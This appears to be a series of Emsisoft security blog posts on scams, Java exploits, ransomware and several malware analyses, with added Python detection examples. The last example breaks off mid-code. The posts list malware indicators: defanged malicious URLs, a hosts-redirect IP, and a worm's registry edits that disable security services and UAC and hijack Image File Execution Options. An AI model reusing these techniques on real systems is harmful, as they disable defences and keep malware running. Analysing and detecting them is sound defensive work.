Have you ever received a contact request on Skype from someone you don’t know? This may happen from time to time, particularly if your Skype name is publicly searchable. But what is really behind these contact requests and why do people bother? To find out, we played along and the following conversation ensued:

At first sight it appears to be someone looking for a companion. But the dialogue is suspiciously generic, questions are never really answered and the responses don’t allow for a meaningful discussion of any kind. When asked “Are you a bot”, the invariable answer is “lol no i’m not a bot silly.”
The contact in our example has listed their birthdate as 1980, but claims to be 25 years old. That doesn’t add up either and when we ask about it, the question is completely ignored.
All this makes it obvious that instead of chatting with a real person we are in fact dealing with a chat bot. And this begs the question, why would a chat bot be interested in a human companion? Surely not for an engaging conversation… The answer to that question becomes clear when we look at the link the helpful Eva sent us when she offered her “free passes”. We are asked to sign up to what appears to be an X-rated video chat site:

It looks like our Eva is in fact Nancy, but who cares about such minor details when it appears we have a free date? Let’s move on to the registration:

This looks like a standard registration form, so let’s complete it and click Continue:

Now wait a second, our credit card information is required and that’s not what we had agreed to. Why would we need to provide payment details if “today’s charge is $0.00” anyway? There goes our free date, and at the same time this reveals the true aim of this scam: credit card fraud.
“Safe Secure Encrypted” sounds good, but unfortunately we are not convinced of the accuracy of this statement. The site doesn’t even use the HTTP secure protocol (which would give the URL the “https://…” prefix), so our dating adventure ends here.
It’s all about the money
While chat bots may have a legitimate purpose (such as leaving an automated message when you are offline), that isn’t the case here. The only purpose of chat bots like the one we encountered is to trick people into signing up and submitting their credit card details insecurely. Whoever gains access to the requested information (name, card number, CVC/CVV code and so on) can use your credit card on the internet for whatever they want. That’s a chilling thought, as scammers won’t waste any time in getting their hands on your money.
If you have become the victim of a (suspected) credit card scam, it is recommended that you contact your credit card provider (bank or financial institution) as soon as possible. They can block your card immediately and will tell you what steps you need to undertake to regain access to it.

Java is installed on almost all computers. This is an obvious security risk, considering that there are regular announcements on new Java vulnerabilities that enable hackers to infect your PC with malware. However, most users don’t even need Java and can safely uninstall it without losing needed functionality. Keep reading to learn all you need to know about Java and avoid unnecessary security risks to your PC!
Java and JavaScript – there is a huge difference
Both names sound closely related, but the technologies actually aren’t. Whereas Java is a complete programming language and run-time environment for programs, JavaScript is, as you may deduce from the name, a scripting language. Scripting languages are mostly used to run rather small tasks, especially within your browser. JavaScript as part of a website generally doesn’t have access to your computer’s filesystem and can’t run any programs or create files. Java, on the other hand, can. Running Java applications is basically like starting a regular program on your PC, which of course includes the ability to modify files on the system.
Java programs can be run either locally on your PC or as a so-called Java applet in a browser that supports Java. Java applets are embedded in a webpage by means of simple HTML code:

When accessing the webpage with this HTML code, the Java applet called “javaprogram” is downloaded from the web server to your computer where it is run. Java applets are usually used when a website requires access to local files or your computer’s hardware.
Why is Java so dangerous and do I really need it?

Depending on which browser you are using and your settings, there may be security restrictions placed on Java, but these are frequently bypassed by vulnerabilities (“exploits”) within the Java environment or your browser itself. By default, Java applets are forbidden from interacting with other programs outside of the browser and from accessing files on your computer. However, if these restrictions are bypassed by an exploit, your system is wide open to anyone.
WARNING!
THE CURRENT JAVA VERSION IS CONSIDERED VULNERABLE!
Although Oracle, the company behind Java, has published several security updates in recent weeks, new vulnerabilities have already been discovered in the current version that enable specially crafted websites to gain full access to your system. As security updates are usually released with a delay of several months, this means that at any time, the current Java version may be vulnerable. All recently discovered vulnerabilities have one thing in common: They are exclusively related to browser Java applets, not locally installed Java programs.
Do Bilet, Benfry or ThinkFree ring a bell? Probably not, and this comes as no surprise – there are hardly any frequently used Java applets. Java applets are primarily used in business environments and company intranets. As a private user, you are more likely to encounter websites that use JavaScript or Flash. Things are a little different for desktop applications. There are quite a few well-known programs that require Java.
How to use Java securely
Here is Emsisoft’s security advice concerning Java:
- If you don’t need Java at all: Uninstall it! As with any other software, you can do this from the Control Panel via “Programs and Features”.
- If you are using Java programs, but don’t need browser integration, disable it. Information on how to achieve this can be found on the Java Homepage.
- If you do require Java, be sure to keep it up-to-date at all times. Don’t hesitate to apply new updates when they become available, as they may fix critical vulnerabilities.
- As critical vulnerabilities are usually not discovered before there is a new infection wave, it is important to use security software with real-time protection. Emsisoft Anti-Malware is able to reliably detect attacks even by unknown malware, thanks to its three security layers.
“Your computer is blocked!” – Not something you enjoy seeing when using it. Unfortunately, thousands of PC users worldwide find themselves in a situation where, all of a sudden, their computer is unusable unless they pay a fee to unlock it. The FBI or a similar national law enforcement organization seems to claim that access to the computer has been restricted. The use of pirated software, distribution of child porn and copyright infringement are most often brought up as grounds for these restrictions. “Seems” is the keyword here, because a malware infection, not an official law enforcement organization, is responsible.
While the idea of scaring a user into paying money to regain the use of their computer isn’t new and has been used for years by rogue security programs, the “scare” factor is much greater with so-called ransomware because in many cases the PC cannot be used at all, the only active option remaining being the entry of the unlock/payment code.
Recent months have shown a massive increase in ransomware infections, with new variants, droppers and infection methods every day. We previously discussed ransomware in 2011 – The Renaissance of Ransomware, but because the risk of catching such an infection has increased so much, we want to give it extra attention, to make computer users aware of it and point out preventive measures.
There are two main categories of ransomware, the so-called screenlockers and crypto ransomware. Screenlockers are widespread; they use exploit kits, infected sites and downloads and target home users as well as corporate computer users. Crypto ransomware often (but not exclusively) spreads through dedicated server hacks, and home users will not be affected as much by this category of ransomware.
Screenlockers
Screenlocker ransomware can infect a computer in a variety of ways. Popular methods include the use of Java exploits, as many Windows users have outdated versions of Java installed which contain vulnerabilities that malware can exploit to infect a system, and of course porn sites with videos or other content that, when executed or activated, actually installs malware.
A typical screenlocker usually displays a law-enforcement logo. Which logo that is depends on the screenlocker variant, but can also depend on the country. Furthermore, an offense is specified; as mentioned already, this often concerns copyright infringement, child porn distribution, software piracy and the like. Next, of course, is the most important thing – the payment method. Sometimes a specific unlock code is required, but in most cases a prepaid payment method like Ukash or PaySafe is used.
Some screenlockers add extra elements, for example to give the impression that webcam capture is activated or geographical data is being collected, by displaying the IP address and location (see image).

Make sure Windows, as well as all third-party software present on your computer, is up to date, especially Java and Adobe Reader – two programs that are commonly exploited by malware for the simple reason that they are installed on so many systems and many users run older versions. For further advice on how to keep your computer safe, also see this article.
In particular, the number and variety of screenlocker infections exploded in 2012. One of the most common screenlockers is Reveton (see image), commonly referred to as the FBI MoneyPak trojan. While during the first months of 2012 this infection was seen only occasionally, there was a major outbreak in July/August, and since then other variants have also been increasing in prevalence, causing screenlocker infections to surpass the number of rogue infections.
While the ransom screen can look convincing, it is nothing more than a scam, with the only objective being to scare a computer user into paying the ransom. Fortunately, removal of a screenlocker is possible and our experts on the Emsisoft Support forum are always there to help victims of such scams to regain access to their computer.
Crypto ransomware
Well-known crypto ransomware infections are ACCDFISA and Dorifel. Unlike screenlockers, crypto malware actually encrypts personal files (on all drives connected to the computer at the moment of infection), which makes it a much more severe threat than screenlockers. Newer crypto malware variants make recovery of encrypted files extremely difficult if not impossible. A preventive security solution is imperative, as important personal files could be irretrievably lost, which, especially in a corporate environment, can cause serious problems. A few preventive measures, necessary for any server, are:
- Make sure all the latest server/software updates and patches are installed. Server hacks are often performed by exploiting an existing software vulnerability. Whenever a zero-day vulnerability is discovered, a software company will release a patch to fix it, and it is crucial to apply such patches as soon as possible.
- Make sure offline backups (backups stored on a medium not connected to the server computer) are made regularly, because data on any connected backup drive will be affected, making the backup useless.
- Use strong passwords containing random characters. This will make gaining server access through brute-forcing a lot harder.
Other crypto ransomware like Birele infects home users as well as corporate users, using the same methods as screenlocker ransomware. In some cases recovery of the encrypted data is possible.
So, how much money is involved?
A typical screenlocker usually asks for $100 – $200, crypto ransomware may ask a lot more (it is not uncommon for newer ACCDFISA variants to request sums of $4000).


The reason for this difference can be explained by looking at the targeted victims (loss of critical files on a server used to store company/customer data can mean a direct financial loss for the company). Millions are made yearly by the people who set up these scams. The images show a few ransom amounts from different variants. As ransomware is so “popular” and recovery can be difficult, prevention is essential, not only for corporate users but for home users as well. To summarize, we recommend that all users heed the following advice to save themselves a lot of trouble and frustration:
- Make sure all software is up to date and, especially when using servers running 24/7, ensure you are using strong passwords.
- Use a real-time Antivirus solution with a good behavior blocker such as Emsisoft Anti-Malware, which will detect the changes ransomware makes at an early stage.
Last week, a new zero-day Java vulnerability created quite a buzz on the Internet. To illustrate just how effectively this vulnerability is exploited, let’s have a look at an email our research lab received, supposedly from LinkedIn.
Below you can see the email as we received it. It looks harmless enough and appears to be sent to us from a genuine LinkedIn email address.
The message looks pretty authentic, but as it happens “Carlos Green” doesn’t sound familiar. A simple right click and copy of the hyperlink reveals the actual URL address:
hxxp://cdn-iix.static.unkn0wn.or.id/linkfrrequest.html
Which in turn redirects us to:
hxxp://shininghill.net/detects/solved-surely-considerable.php
Analysis of this URL reveals that it exploits a vulnerable Java version (7 update 10 or older) in order to install the well-known ZeuS banking trojan. The image below illustrates how an executable with a size of 285184 bytes, named “readme.exe” is retrieved from the remote server. A quick check of the binary data reveals that this is the same file as the ZeuS executable that will end up infecting the system.

After the malicious code is loaded the browser will redirect to the normal LinkedIn website. The installed malware is detected by Emsisoft products as Trojan.Win32.Zbot.
When testing the malicious URL on the same system with the latest Java update (7 update 11) installed, the site still attempts to infect the computer but does not succeed in requesting and retrieving the readme.exe file. In the end no malware is installed.
More information about this Java vulnerability can be found in the Oracle Security Alert for CVE-2013-0442.
Java exploits are among the most common sources of infection. Many computer users have Java installed but do not keep it up to date. This makes it a profitable business for malware writers and distributors to look for (new) vulnerabilities and exploit them. New exploit kits are sold for thousands of dollars.
If you have become the victim of this exploit and need help cleaning your computer, our experts in the “Help, my PC is infected!” Emsisoft Forum are always ready and willing to offer additional help. The removal service is free even if you are not an Emsisoft customer yet.
To prevent infection in the first place, make sure you:
- Keep Java and other commonly exploited software (e.g. Adobe Reader and Flash player), as well as your Windows installation up to date.
- Use an Antivirus solution with a good behavior blocker, such as Emsisoft Anti-Malware. Traditional signature-based detection alone is ineffective against this type of malware.
“Cloud” is definitely one of the IT sector’s most popular marketing words of recent years. The virtual clouds promise you easy and mobile access to data and services. The anti-virus sector has also come to use this technology. Fast scans and very low resource usage are clear advantages of cloud-based scanners. But, as usual, there are two sides to the coin.
What is a cloud?
Cloud-computing is, put simply, the distributed delivery of IT infrastructure over a network. This can be basically anything. Storage services in particular are currently in vogue, where a computing center often offers storage over the web. You can use this storage on your PC at home just like a conventional local hard drive even though it is really located hundreds or even thousands of miles away. As you, the user, never know exactly which server your data is on, we speak of a data cloud where everything is stored.
Complete programs and services are also offered via cloud. Just like conventional client/server architecture, spreadsheet software for example is run on an external computer, which is a server. You are provided with an interface on your own PC via the Internet, which allows you to use the software. This is very convenient as it requires no software to be installed, and computationally intensive operations are also outsourced.
Conventional anti-virus solutions have a problem
Conventional virus scanners are still based on signatures. Yet sooner or later they will be stuck between a rock and a hard place as the number of newly discovered malware variants doubles every 12 to 18 months. This then multiplies the number of signatures to be loaded exponentially. Virus scanners detect malware using these signatures, which are essentially digital fingerprints (see our article Signature recognition or behavioral analysis – Which is better?).
This means that scanner-based security software uses more and more storage space every year and affects users who have a bad Internet connection in particular, as they have to load the signatures either directly during installation or during the first online update. Some providers require several hundred megabytes – a nightmare for users who do not yet have a broadband Internet connection. They also use a lot of RAM as the signatures need to be in the RAM for quick scans. High memory usage has a negative effect on the performance of older PCs in particular and makes these programs lose valuable points in comparative tests. Yet a greater memory usage usually also means more signatures and therefore better detection rates in general.
What are the advantages of cloud anti-virus technology?
Security solutions in the virtual cloud solve almost every problem that conventional, locally installed malware mashers have. The user only has to download pure scanner technology, which is only a few megabytes or even kilobytes from most providers. All signatures are located on a centralized scan server and can be updated at any time, without any delay and in any number desired.
In a way, the cloud scanner does the opposite of conventional signature scanners by creating signatures from the files found on the PC and submitting them to the scan server for analysis. If there is a hit, it will alert you of an infection as usual. You cannot see that this whole procedure is handled externally. You only see the result and that the scan is running way faster and using much fewer resources. The cloud scanner also detects deviations from normal system status by combining the data of a vast user community very quickly, which is another advantage. This makes it possible for the system to be viewed as a whole and to detect new unknown malware variants.
So what’s the catch?
It just sounds too good to be true. Faster, better, using fewer resources – if this were all true, there would be no more conventional virus scanners. The devil is in the details for cloud anti-virus software: A regular PC hosts 300,000 to 500,000 files on average. If all these were scanned, uploading the signatures created on the fly to the scan server would take forever.
This is exactly why cloud anti-virus software filters the files to be scanned in the first place according to different rules and parameters. For instance, there are some file types or paths that are generally considered safe. Many cloud anti-virus solutions therefore come with huge whitelists. These are sort of inverse signatures that classify known programs as safe. This massively reduces the number of files to be scanned – even though more data needs to be downloaded to your PC.
This incomplete scan is, however, the Achilles heel of this technology. If not all of the files are properly scanned there are always gaps that malware can use, whether these are as yet unused paths or a file type that has been considered safe until now.
Another problem is that files that the scan cloud has not yet detected at all are, in most cases, entirely submitted to the cloud for further analysis. If you were happy about the small download, you’ll get a nasty surprise when scanning for the first time: countless megabytes are uploaded to the cloud. And many will not even be aware of the fact that private or important company data ends up on third-party servers.
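To make the trade-off concrete, here is an added model (written for this article, not Emsisoft’s code or any vendor’s) of the client-side logic described in the last three paragraphs: path/type pre-filtering, hash lookups against safe and bad lists, and full upload of files the cloud has never seen. The file set, hash lists and filter rules are constructed for the demo.

```python
import hashlib
from dataclasses import dataclass


@dataclass
class ScanFile:
    path: str
    data: bytes


def _h(data):
    """The 'signature created on the fly': a SHA-256 fingerprint of the file."""
    return hashlib.sha256(data).hexdigest()


# Constructed stand-ins for the scan server's knowledge: "inverse signatures"
# (hashes classified as safe) and a small blacklist.
SAFE_HASHES = {_h(b"MZ legit notepad"), _h(b"MZ legit calc")}
KNOWN_BAD = {_h(b"MZ evil dropper")}

# Constructed client-side pre-filter rules: what is never hashed or uploaded.
TRUSTED_PATH_PREFIXES = ("c:\\windows\\fonts\\", "c:\\program files\\trusted vendor\\")
TRUSTED_EXTENSIONS = {".txt", ".jpg", ".ttf"}

# Constructed file set; the payload in Fonts\ is byte-identical to the known
# dropper but sits behind a "safe" path and extension.
SAMPLE_FILES = [
    ScanFile("C:\\Windows\\notepad.exe", b"MZ legit notepad"),
    ScanFile("C:\\Windows\\System32\\calc.exe", b"MZ legit calc"),
    ScanFile("C:\\Users\\me\\Documents\\contract.docx", b"PK confidential contract " * 40),
    ScanFile("C:\\Users\\me\\Downloads\\readme.exe", b"MZ evil dropper"),
    ScanFile("C:\\Windows\\Fonts\\readme.jpg", b"MZ evil dropper"),
    ScanFile("C:\\Users\\me\\Pictures\\cat.jpg", b"JFIF..."),
]


def prefiltered(f):
    """True if the whitelist rules exclude this file from scanning altogether."""
    p = f.path.lower()
    return p.startswith(TRUSTED_PATH_PREFIXES) or any(p.endswith(e) for e in TRUSTED_EXTENSIONS)


def cloud_scan(files):
    """Simulate one scan: returns what was skipped, recognised, detected and
    uploaded, plus the bytes that left the PC (32 per hash, whole file if unknown)."""
    report = {"skipped": [], "known_safe": [], "detected": [], "uploaded": [], "bytes_uploaded": 0}
    for f in files:
        if prefiltered(f):
            report["skipped"].append(f.path)
            continue
        digest = _h(f.data)
        report["bytes_uploaded"] += 32  # only the fingerprint is sent for the lookup
        if digest in SAFE_HASHES:
            report["known_safe"].append(f.path)
        elif digest in KNOWN_BAD:
            report["detected"].append(f.path)
        else:
            # Never seen before: the whole file goes to the cloud for analysis,
            # which is where the bandwidth and confidentiality cost shows up.
            report["uploaded"].append(f.path)
            report["bytes_uploaded"] += len(f.data)
    return report


def missed_threats(files, report):
    """Files the scan never looked at although their hash is on the blacklist:
    the gap the pre-filter opens."""
    return [f.path for f in files if f.path in report["skipped"] and _h(f.data) in KNOWN_BAD]


if __name__ == "__main__":
    r = cloud_scan(SAMPLE_FILES)
    print(r)
    print("missed:", missed_threats(SAMPLE_FILES, r))
```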
Hybrid technology as the best solution
We believe that combining a cloud service with a conventional anti-virus scanner offers the best of both technologies. This is why many Emsisoft products use cloud features.
First of all, Emsisoft Anti-Malware offers the possibility of participating in the “Emsisoft Anti-Malware Network”. If you enable this option, all decisions regarding alerts from the behavior blocker are directly submitted to our server. This enables other users to see if the majority of the community allows or blocks a program and thus helps you to make a decision. There is also a “trust index” for every program based on statistical calculations. Programs that are definitely safe are put on a whitelist, and there will be no further alerts for this program.

Emsisoft Anti-Malware’s scanner also asks if you would like to submit suspicious patterns in newly discovered files (only program files, no documents). Our analysis team then analyzes the suspicious file thoroughly and creates a new signature if need be. This helps Emsisoft and also all users by reducing the response time in the event of new malware outbreaks and offering the best protection possible.
Our HIPS-based firewall Emsisoft Online Armor also uses the Emsisoft Anti-Malware Network. Saved rules for allowed and blocked programs are submitted to the Emsisoft cloud in order to reduce future alerts. False alerts are avoided in an efficient manner without lowering the security level.
Incidentally, all data on program files stored in the Emsisoft Anti-Malware Network is visible to everyone and even searchable. The Emsisoft cloud is thus not closed, but absolutely transparent and can be accessed through a website as an interface at any time. There are currently more than 12 million known program files (as of November 2012), including geographical distribution of malware occurrence. See for yourself: IsThisFileSafe.com.
Social networking has really taken off in the last couple of years, and the websites built around it are seeing huge traffic all around the world. Facebook, Twitter, Orkut, and then there is Vkontakte (Vk.com for English-speaking users), each with millions of registered users and thus huge targets for malware authors. The more the merrier, they say.

We received reports of an increasingly prevalent piece of malware spreading via Vkontakte and carried out a deep analysis.


As seen in the images above, malicious links propagate to other users, possibly from compromised accounts, even though Vkontakte seems to be aware of the malware and warns in every possible way. The malware has been spreading under the name Podarok.exe, and a simple search shows how widespread it is. It has certainly been around for some time, but the mechanism of infection and its consequences have been changing rapidly. The malware itself is actually a batch file, converted to an executable using the BatToExe Converter from http://www.f2ko.de/English/b2e/index.php. The converter stores the batch file, named “troy_mcclur.bat”, in the resource section of the executable and packs it with UPX. At run time the batch file is extracted from the resource and executed.

The usual trick of disguising itself with a trusted icon continues; here the malware uses a modified Vkontakte.com favicon.

Once executed, the malware opens Notepad.exe while, in the background, it modifies the hosts file to redirect the following addresses to a specific IP, 85.234.190.32:

The trojan also goes on to create another file named “h(random character, possibly)sts” and hides the original hosts file.
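As an added illustration of the hosts-file tampering described above (example code written for this article, not part of the original analysis or of any Emsisoft product): a small Python checker that parses a hosts file, flags watched domains that no longer resolve locally, spots a single IP absorbing many domains, and looks for the “h?sts” lookalike file. The hosts content, the watched-domain set and the lookalike filenames are constructed for the demo.

```python
import ipaddress
import re
from collections import defaultdict

# Domains the trojan described above targets (taken from the write-up);
# extend the set with whatever your own environment considers sensitive.
WATCHED_DOMAINS = {"vk.com", "vkontakte.ru", "odnoklassniki.ru",
                   "odnoklassniki.ua", "mail.ru", "durov.ru"}

# Constructed sample of a tampered Windows hosts file (not captured from the malware).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
85.234.190.32   vk.com
85.234.190.32   www.vk.com
85.234.190.32   wap.vkontakte.ru
85.234.190.32   mail.ru   # added by the trojan
192.168.1.10    intranet.example.local
"""

HOSTS_LINE = re.compile(r"^\s*(?P<ip>[0-9A-Fa-f.:]+)\s+(?P<names>[^#]+)")


def parse_hosts(text):
    """Yield (ip_address, hostname) pairs; comments and malformed lines are ignored."""
    for line in text.splitlines():
        m = HOSTS_LINE.match(line)
        if not m:
            continue
        try:
            ip = ipaddress.ip_address(m.group("ip"))
        except ValueError:
            continue  # first token is not an address
        for name in m.group("names").split():
            yield ip, name.lower()


def registrable(hostname):
    """Crude registrable-domain fold: 'www.durov.vkontakte.ru' -> 'vkontakte.ru'."""
    parts = hostname.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else hostname


def find_hijacks(text, watched=WATCHED_DOMAINS):
    """Return [(hostname, ip)] for watched domains mapped to a non-local address."""
    hits = []
    for ip, name in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue  # normal localhost lines, or a harmless 0.0.0.0 blocking entry
        if registrable(name) in watched:
            hits.append((name, str(ip)))
    return hits


def sinkhole_addresses(text, min_domains=3):
    """IPs that several hostnames are pointed at: one address serving every
    hijacked site is the pattern in the write-up (85.234.190.32)."""
    counts = defaultdict(int)
    for ip, name in parse_hosts(text):
        if not (ip.is_loopback or ip.is_unspecified):
            counts[str(ip)] += 1
    return {ip: n for ip, n in counts.items() if n >= min_domains}


def lookalike_hosts_files(filenames):
    """Entries in the drivers\\etc directory that mimic 'hosts' with one character
    changed, like the 'h?sts' file the trojan drops next to the hidden original."""
    return [f for f in filenames
            if re.fullmatch(r"h.sts", f, re.IGNORECASE) and f.lower() != "hosts"]


if __name__ == "__main__":
    for name, ip in find_hijacks(SAMPLE_HOSTS):
        print(f"hijacked: {name} -> {ip}")
    print("sinkholes:", sinkhole_addresses(SAMPLE_HOSTS))
```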

We attempted to navigate to the IP mentioned above and were presented with the following message.

Simple Google translation gives a basic idea, but our Ukraine-based researcher helped us with a translation of the whole thing.
Блокировка Веб-Aнтивирусом
Blocked by Web-Antivirus
Or
Blocked by Web-Filter
Запрашиваемый URL-адрес не может быть предоставлен
The URL you are trying to reach cannot be served.
Причина: вредоносная ссылка
Reason: malicious link
Если Вы считаете, что Веб-страница заблокирована ошибочно, отошлите SMS сообщение с текстом
If you think that this web-page was blocked in error, please send sms with the following text:
64261823 на номер 1350 (Россия)
64261823 to 1350 (Russia)
64261823 на номер 7139 (Украина)
64261823 to 7139 (Ukraine)
64261823 на номер 3336 (Белоруссия)
64261823 to 3336 (Belarus)
Сообщение создано:
Антивирус Касперского 2010
Message created:
Kaspersky Antivirus 2010
Well, the initial reaction on seeing the message would be that a malicious website has been blocked by Kaspersky Antivirus 2010, and this is where the new age of social engineering begins. Analyzing this incident, and a few other similar ones since last year: when the user tries to access his profile at Vk.com, the fake Kaspersky warning appears saying ACCESS DENIED and that the website is blocked. To solve the issue, the user must send an SMS with the text
- 64261823 to number 1350 (Russia)
- 64261823 to number 7139 (Ukraine)
- 64261823 to number 3336 (Belarus)
Thus, any unaware user goes on to send the premium SMS to the specified number, and the malware author/developer gets his share of the money generated.
There has been malware locking users out of the Windows system, out of activation screens and even out of files on the system. The mechanism we wrote about today is very simple, a modification of the hosts file, but its effect is to cut off access to a user’s favourite and trusted places on the web. Exploiting the trust factor in this way takes on another dimension: the source of revenue evolves with minimal user interaction and minimal effect on the system.
Emsisoft Anti-Malware protects users by detecting this malware as Trojan.Win32.Qhost!IK, and will remove the infected hosts file from the system. We recommend that users visit http://support.microsoft.com/kb/972034#LetMeFixItMyselfAlways for further instructions on restoring the original hosts file. Be safe, and stay updated.
In the security and malware research space, every now and then something comes along that suddenly becomes widespread and raises eyebrows all around. The latest “Here you have” worm is one such incident, and we thought we would share our findings with end users and make them aware of its capabilities and technicalities. Emsisoft Anti-Malware detects the related malicious binaries as Email-Worm.Win32.VBMania!A2 or Trojan.Win32.Swisyn!IK.

The image above shows a sample email with the subject “Here you have”. If we look closely, the email doesn’t contain any file attachment, only a hyperlink. If the hyperlink is clicked, it downloads a malicious file. Once the file is executed, it connects to the following addresses:

In this specific case the worm turns the victim’s system into a spam source. It reads the address books of Microsoft Outlook and Yahoo! Messenger and goes on to send malicious emails to the contacts listed.

The forwarded email reaches the recipients’ inboxes with a malicious hyperlink, as can be seen in the image above – hxxp://members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr. When clicked, the link downloads a .SCR file that carries a PDF icon to confuse end users. The worm is written in Visual Basic and is approximately 284 KB in size.

The worm drops the following files in the locations listed:
The file then copies itself to the root of every drive, including removable disks, which gives it the ability to spread via removable disks and flash drives.
- %SystemDrive%\autorun.inf [hidden]
- %SystemDrive%\open.exe [hidden]
- %SystemDrive%\%UserName% CV 2010.exe
The worm goes on to delete the following registry keys, related to the Windows Security Center service and Windows Automatic Updates:
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WSCSVC
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WUAUSERV
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wuauserv
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WSCSVC
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WUAUSERV
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv
It modifies Windows and Outlook security settings:
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Outlook\Security\ObjectModelGuard: 0x00000002
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA: 0x00000000
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\PromptOnSecureDesktop: 0x00000000
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableVirtualization: 0x00000000
And it modifies the Windows logon “Shell” value so that it runs automatically when Windows starts:
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: “Explorer.exe C:\WINDOWS\csrss.exe”
The worm also enumerates computers on the current network and then copies itself to them.

We observed another trick this malware carries out. The worm creates many entries under the “Image File Execution Options” subkey, covering a lot of executable names from many well-known applications, antivirus products included, and sets the Debugger value to the worm file. Thus, whenever one of those applications is started, the worm is executed as well.
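To make the Image File Execution Options trick concrete, here is an added example (written for this article, not from the original write-up) in Python that parses a `.reg` export of the IFEO key, lists every image with a `Debugger` value and groups images by debugger executable, since one binary registered as the debugger of many unrelated programs is the worm’s pattern rather than a developer’s JIT debugger. The export text and image names are constructed; `C:\WINDOWS\csrss.exe` is the dropped copy named above.

```python
import re
from collections import defaultdict

IFEO_MARKER = "\\image file execution options\\"

# Constructed .reg export fragment modelled on the IFEO abuse described above.
# C:\WINDOWS\csrss.exe is the worm's dropped copy from the write-up; the image
# names (avscanner.exe etc.) are placeholders, not the worm's real target list.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscanner.exe]
"Debugger"="C:\\WINDOWS\\csrss.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe]
"Debugger"="C:\\WINDOWS\\csrss.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\devenv.exe]
"Debugger"="\"C:\\Program Files\\Debugger\\vsjitdebugger.exe\" -p %ld -e %ld"
"""

KEY_LINE = re.compile(r"^\[(?P<key>[^\]]+)\]\s*$")
VALUE_LINE = re.compile(r'^"(?P<name>[^"]+)"=(?P<raw>.+)$')


def _unescape(raw):
    """Turn a .reg string literal (backslashes and quotes escaped) into its real value."""
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        return re.sub(r'\\(["\\])', r"\1", raw[1:-1])
    return raw  # dword:/hex: values are returned as written


def find_ifeo_debuggers(reg_text):
    """Return [(image_name, debugger_value)] for every IFEO subkey carrying a Debugger value."""
    results, image = [], None
    for line in reg_text.splitlines():
        k = KEY_LINE.match(line)
        if k:
            key = k.group("key")
            # Track the current subkey; only IFEO\<image> keys are of interest.
            image = key.rsplit("\\", 1)[-1] if IFEO_MARKER in key.lower() else None
            continue
        v = VALUE_LINE.match(line)
        if image and v and v.group("name").lower() == "debugger":
            results.append((image.lower(), _unescape(v.group("raw"))))
    return results


def debugger_executable(value):
    """First token of the Debugger command line, surrounding quotes removed."""
    if value.startswith('"'):
        return value[1:value.find('"', 1)]
    return value.split()[0]


def mass_hijacks(reg_text, min_images=2):
    """Group images by debugger executable and keep executables attached to
    several images: a single file 'debugging' many programs is the hijack."""
    groups = defaultdict(list)
    for image, value in find_ifeo_debuggers(reg_text):
        groups[debugger_executable(value)].append(image)
    return {exe: sorted(imgs) for exe, imgs in groups.items() if len(imgs) >= min_images}


if __name__ == "__main__":
    for image, value in find_ifeo_debuggers(SAMPLE_REG):
        print(f"{image}: Debugger = {value}")
    print("suspicious:", mass_hijacks(SAMPLE_REG))
```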

It’s a tricky world out there and we all should keep using our common sense before committing to any clicks or tricks. Keep your security products updated and be safe. We at Emsisoft are, as always, vigilant and will always be steps ahead of these malware authors.
There is a new rogue variant making the rounds under the name Antivirus2010. The malware copies itself to the System32 directory with a name similar to that of a commonly used Windows file present in the same directory.

To the naked eye there appear to be two userinit.exe files, although one has a distinctive icon and the other doesn’t. When we listed the System32 directory from the command prompt, the non-English character in the malicious userinit.exe name showed up immediately.
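
The lookalike file name above can be caught automatically by folding each name to the ASCII string it would be mistaken for and comparing it with a list of genuine system binaries. The following is an added example, not Emsisoft's code. The directory listing is constructed; the post does not say which non-English character the malicious file used, so a Cyrillic letter and a fullwidth Latin letter are assumed here as stand-ins.

```python
"""Flag directory entries whose names visually impersonate known system binaries.
Added example; the listing and the confusable map are constructed."""
import unicodedata

# Small map of Cyrillic letters that render like Latin ones (assumed subset).
CONFUSABLES = str.maketrans({
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u04bb": "h",
})

# Names an analyst would expect to see exactly once in System32.
KNOWN_BINARIES = {"userinit.exe", "winlogon.exe", "csrss.exe", "lsass.exe",
                  "svchost.exe", "explorer.exe"}

def skeleton(name):
    """Reduce a file name to the ASCII form a human would read it as:
    NFKC handles fullwidth/compatibility forms, the map handles Cyrillic lookalikes."""
    folded = unicodedata.normalize("NFKC", name).translate(CONFUSABLES)
    return folded.casefold()

def find_lookalikes(listing, known=KNOWN_BINARIES):
    """Return (name, reasons) for entries that are not plain ASCII, that match a
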